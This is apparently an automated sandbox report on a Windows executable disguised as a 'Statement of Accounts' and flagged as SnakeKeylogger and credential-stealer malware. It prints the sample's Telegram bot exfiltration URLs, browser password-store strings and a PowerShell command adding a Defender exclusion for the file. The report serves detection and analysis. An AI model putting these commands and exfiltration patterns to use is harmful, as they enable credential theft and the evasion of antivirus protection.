                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C10000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003C8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=env
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003B43000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003B43000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003CCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003CBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/v
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49801 version: TLS 1.2

                System Summary

                barindex
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, Clock.csLong String: Length: 264295
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 0_2_00007FF848CD27B20_2_00007FF848CD27B2
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 5_2_00007FF848CE874D5_2_00007FF848CE874D
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: No import functions for PE file found
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2209303449.0000000003FA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dll0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAdelina.exe0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2215485277.000000001EEF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGreenEnergy.dll@ vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000162A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGreenEnergy.dll@ vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2209480776.00000000045CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dll0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2209480776.00000000045CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAdelina.exe0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2215009073.000000001EB5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2215009073.000000001EB5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowe4 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000000.2151559394.0000000000EA2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGcz.exe8 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAdelina.exe0 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeBinary or memory string: OriginalFilenameGcz.exe8 vs [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@3/3
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.logJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeMutant created: NULL
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeMutant created: \Sessions\1\BaseNamedObjects\WHDLdSBXjS
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqiqdzi5.v5r.ps1Jump to behavior
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003DFC000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003DEC000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003E42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeVirustotal: Detection: 22%
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeReversingLabs: Detection: 18%
                Source: unknownProcess created: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess created: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess created: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: propsys.dllJump to behavior
